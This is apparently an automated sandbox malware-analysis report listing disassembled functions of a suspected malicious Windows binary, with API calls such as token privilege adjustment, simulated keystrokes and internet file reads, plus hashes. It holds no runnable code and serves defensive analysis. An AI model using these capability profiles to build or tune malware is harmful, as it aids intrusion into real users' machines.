Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: 26e6719902027b7ab19ef3dea0f3ae69f662fb2f78a60e6068b9ff9a0c2fefef
Instruction ID: 1d787332fc5ecd129a6ef735c9654a0e2d1950b95b505bb00c14f9f5ff00a1b6
Opcode Fuzzy Hash: 26e6719902027b7ab19ef3dea0f3ae69f662fb2f78a60e6068b9ff9a0c2fefef
Instruction Fuzzy Hash: CE41EE70610200AFDB14AF28C886E7EB7EDEF44B24F14855CF956AB2C2CB749D618B95

Function 0028EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0028EB8A
_wcscmp.LIBCMT ref: 0028EBBA
_wcscmp.LIBCMT ref: 0028EBCF
FindNextFileW.KERNEL32(00000000,?), ref: 0028EBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0028EC0E

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 508d2c979db1e23506bef6bc85e2b34d0387df383d863a75db3ae1630b38b369
Instruction ID: f4e9e9de4d5ab590d9f27ec6e8c3c39da03ef3417dfa76b002cb051f70eded4e
Opcode Fuzzy Hash: 508d2c979db1e23506bef6bc85e2b34d0387df383d863a75db3ae1630b38b369
Instruction Fuzzy Hash: 1741AF35610702CFCB08DF28C491A9AB7E4FF4A314F10455EE95A8B3A1DB71E964CF95

Function 002A8111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 002A8160
IsWindowEnabled.USER32 ref: 002A816E
GetForegroundWindow.USER32(?,?,00000001), ref: 002A817B
IsIconic.USER32 ref: 002A8189
IsZoomed.USER32 ref: 002A8197

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: b12dc64abff24a7f711137c0f9f6d681a05be8f15d7e39ef5b92bd6dea51c08f
Instruction ID: f09935871b7723e6974f2305467d64022fb56a9913bd476f42c61eef23c09007
Opcode Fuzzy Hash: b12dc64abff24a7f711137c0f9f6d681a05be8f15d7e39ef5b92bd6dea51c08f
Instruction Fuzzy Hash: 2511E731310511AFE7212F26EC48E6FBB9CEF56761B054429F84ED7281CF70D9238AA4

Function 0025E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0025E014,74DF0AE0,0025DEF1,002DDC38,?,?), ref: 0025E02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0025E03E

Strings

GetNativeSystemInfo, xrefs: 0025E038
kernel32.dll, xrefs: 0025E027

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 977e6b9b53da3d4c4d401ac9c7fae1f67f5908f4145ef87c2bc9ecfd6ff6371f
Instruction ID: 632b96f4ee23b5d4e0e0cff47c7a6d1bdcaecfd0dd5d329a21efa299d30e147c
Opcode Fuzzy Hash: 977e6b9b53da3d4c4d401ac9c7fae1f67f5908f4145ef87c2bc9ecfd6ff6371f
Instruction Fuzzy Hash: C0D05E318207139FCB254F60EC08A22B6D4AF02701F294439A885A2190D6F4D8988650

Function 0025B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 0025B34E: GetWindowLongW.USER32(?,000000EB), ref: 0025B35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 0025B22F

Part of subcall function 0025B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0025B5A5

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: 85f4b6b15fa3569fbf043c4e45250399808279127c633c98e262c6739560dcbf
Instruction ID: 1671dec6c23ba1fe47f8e45dea42464b4dc2928df19b5d8873a731b154660f88
Opcode Fuzzy Hash: 85f4b6b15fa3569fbf043c4e45250399808279127c633c98e262c6739560dcbf
Instruction Fuzzy Hash: 06A15870134106BADF3B6E294C99EFF296CEB42382F55411EFC02D2181DB759C399A7A

Function 00294EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,002943BF,00000000), ref: 00294FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00294FD2

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 87acf9bbe1dd2d4003b461108966884cc0e7107f8df0eb8a12c14580c5ceaa82
Instruction ID: f63f899ab1838160745f122d18bcfeb01253b1c4e59b2c31eea1253e5fb15ea2
Opcode Fuzzy Hash: 87acf9bbe1dd2d4003b461108966884cc0e7107f8df0eb8a12c14580c5ceaa82
Instruction Fuzzy Hash: 0841F87162460ABFEF21DF90DC85EBFB7BCEB40314F10006EF60566180DAB19E669B90

Function 002477B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00247921

Strings

\Q/, xrefs: 002C1028

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: _memmove
String ID: \Q/
API String ID: 4104443479-2459328394
Opcode ID: ea39509006ddb4006d46331e58b8dde44bc40756894a1e175f982e2389505fe2
Instruction ID: 604327d569f39dd1f54ae81288789a44aa18c82f3687c582f04906eeb1793582
Opcode Fuzzy Hash: ea39509006ddb4006d46331e58b8dde44bc40756894a1e175f982e2389505fe2
Instruction Fuzzy Hash: 44A24D7492421ACFCB28CF58C880BADB7B1FF48314F2581A9D869AB391D7709D91DF90

Function 0028E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0028E20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0028E267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0028E2B4

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 8b0265a403e2990f143fe3c273d7de907b3fb5fbb0c336b700c35af2b6e132fd
Instruction ID: df4259065504a6b4f1db40a7b99ec83a9a4c5beacadca28789cfd6d5cb0f8e85
Opcode Fuzzy Hash: 8b0265a403e2990f143fe3c273d7de907b3fb5fbb0c336b700c35af2b6e132fd
Instruction Fuzzy Hash: 09218C35A10118EFDB00EFA5D884EADFBB8FF49710F0480AAE945AB291CB319915CF50

Function 0027B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0025F4EA: std::exception::exception.LIBCMT ref: 0025F51E
Part of subcall function 0025F4EA: __CxxThrowException@8.LIBCMT ref: 0025F533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0027B180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0027B1AD
GetLastError.KERNEL32 ref: 0027B1BA

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: d35118438e62276caf6ddc44c6a51b1c6b7826c27a49a7c8ba4531ec213e1743
Instruction ID: 532d24a3b4819dd3ce2990725ec815cc0a47829aa311f66e2e0301e7628e5589
Opcode Fuzzy Hash: d35118438e62276caf6ddc44c6a51b1c6b7826c27a49a7c8ba4531ec213e1743
Instruction Fuzzy Hash: A211C1B1424205AFE7189F54ECC9D2BB7BCFB44310B20852EE45A93240EB70FC518A64

Function 00286606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00286623
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00286664
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0028666F

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 7a03c11bb5b0337c05d7955fef25c430742587d0fe1eb37982e0c9a7373c0ae7
Instruction ID: f5ff8de6b1597f109c69fb4acc64c84b8769ace70bce3670ac368840e9f82c28
Opcode Fuzzy Hash: 7a03c11bb5b0337c05d7955fef25c430742587d0fe1eb37982e0c9a7373c0ae7
Instruction Fuzzy Hash: 7B115E75E11228BFDB109FA5EC44FAEBBBCEB45B10F104166F910E7290D3B05A018BA1

Function 002871FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00287223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0028723A
FreeSid.ADVAPI32(?), ref: 0028724A

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: b383e7efd692bb447cdee4b86297324153c9e6a1bee7d233617b4f14c8b357c4
Instruction ID: 1cd0680cccfe6a7272bab2157a7ec26c9251091a7ff47f34aca081f9c0fa6420
Opcode Fuzzy Hash: b383e7efd692bb447cdee4b86297324153c9e6a1bee7d233617b4f14c8b357c4
Instruction Fuzzy Hash: E5F01279914219BFDF04DFE8DD99EEDBBB8FF08301F104469A502E2191E27096458B10

Function 0028F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0028F599
FindClose.KERNEL32(00000000), ref: 0028F5C9

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 87c9d831f0b0948bc2e3aa043e5a258f0dee7330bb1a7e5ce838f12f9d65f055
Instruction ID: 5cd7a51f2c48d843b68a863208e26f817191478d67ed879d3d5db4300925e0d3
Opcode Fuzzy Hash: 87c9d831f0b0948bc2e3aa043e5a258f0dee7330bb1a7e5ce838f12f9d65f055
Instruction Fuzzy Hash: AA118E316102009FD710EF28D849A2EB7E8FF85725F04892EF8AA97291DB74A9148B85

Function 0028CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0029BE6A,?,?,00000000,?), ref: 0028CEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0029BE6A,?,?,00000000,?), ref: 0028CEB9

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 06f1a5f1a5f67ca7e43dba5bd18b8f9b43449fdc7813a1888d0a18100598fbc7
Instruction ID: 6366707c72ee640f4de0023ecc3a84ac620ee1e42481a3903977ee0e8307846b
Opcode Fuzzy Hash: 06f1a5f1a5f67ca7e43dba5bd18b8f9b43449fdc7813a1888d0a18100598fbc7
Instruction Fuzzy Hash: D2F08235111229ABDB10AFA4EC49FEA776DBF08351F004165F915E6181D7709A50CFA1

Function 0028411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00284153
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00284166

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 8e4f5f9e2055bd194052a8b2a6912a18635c4482191cebe582c4be54155c822b
Instruction ID: a0c51af301fd9b39921ba5d3145fdcb8d3bf9b75d8f626382e124c2c930fad45
Opcode Fuzzy Hash: 8e4f5f9e2055bd194052a8b2a6912a18635c4482191cebe582c4be54155c822b
Instruction Fuzzy Hash: 20F06D7491024EAFDB059FA0C809BBE7BB0EF00305F008019F96596192D77986129FA0

Function 0027AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0027ACC0), ref: 0027AB99
CloseHandle.KERNEL32(?,?,0027ACC0), ref: 0027ABAB

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: cdd5b1fefe9aaa0587c32097b42485664768339da38865e076215f1918980def
Instruction ID: 50cc8e19b8c620a194a0405b84e945b2f99ff85f5def1408b5bf1d175634a248
Opcode Fuzzy Hash: cdd5b1fefe9aaa0587c32097b42485664768339da38865e076215f1918980def
Instruction Fuzzy Hash: F3E08C32010610AFE7212F24FC08D77BBE9EF00321B208839F89A81430DB32ACA0DF50

Function 002681AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00266DB3,-0000031A,?,?,00000001), ref: 002681B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 002681BA

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 32018adf5207d9289e98c29c12f858a241fbb5ade798a08acec1234e9604d6bc
Instruction ID: 28b965c1afcc2e81ee0ae0f0f1f69ba0183488567c65a4d5e444b58c1f6a31a1
Opcode Fuzzy Hash: 32018adf5207d9289e98c29c12f858a241fbb5ade798a08acec1234e9604d6bc
Instruction Fuzzy Hash: 85B09231084648ABDB002BA1FC0DF587F68EB48652F0140A1F60D460618B7254108E92

Function 0026D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cc73d4158d3a3ad751ba49e2ca822c996eaecc24f73ec637905ca7150e9576d
Instruction ID: 66c25728a7717f51662cde3109918fb09bf2f432ffa5400e06207693df1b598d
Opcode Fuzzy Hash: 5cc73d4158d3a3ad751ba49e2ca822c996eaecc24f73ec637905ca7150e9576d
Instruction Fuzzy Hash: 7F321421E3AF458DD7239635D826335A38DAFB73D4F15D727E819B59A6DB28C8C34100

Function 002496C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 3d8e22ddb67287af639cca508679d02c710df6c54133555cc5d2f07ac35db84f
Instruction ID: cf5dc71c389ccd3dc1ea9580d12b6c2fcb554c09c67af3485dc40cd7ffc3f71d
Opcode Fuzzy Hash: 3d8e22ddb67287af639cca508679d02c710df6c54133555cc5d2f07ac35db84f
Instruction Fuzzy Hash: 1322AC716283019FD728DF14C881BAFB7E4AF84754F10491DF89A9B291DB71E9A4CF82

Function 0027038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4f3bec086eb1e9d53bfdb95bee8b840c3786f0654e92fea23406b698aaf2c24
Instruction ID: 0a62acea7bbdd69333c594e136d5c0b295823d7ad6b7587eb6e5544d182718da
Opcode Fuzzy Hash: c4f3bec086eb1e9d53bfdb95bee8b840c3786f0654e92fea23406b698aaf2c24
Instruction Fuzzy Hash: E5B10120D2AF514DD32396399875336B75CAFBB2D6F91D71BFC2A74D22EB2189834180

Function 0028B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0028B6DF

Part of subcall function 0026344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0028BDC3,00000000,?,?,?,?,0028BF70,00000000,?), ref: 00263453
Part of subcall function 0026344A: __aulldiv.LIBCMT ref: 00263473

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
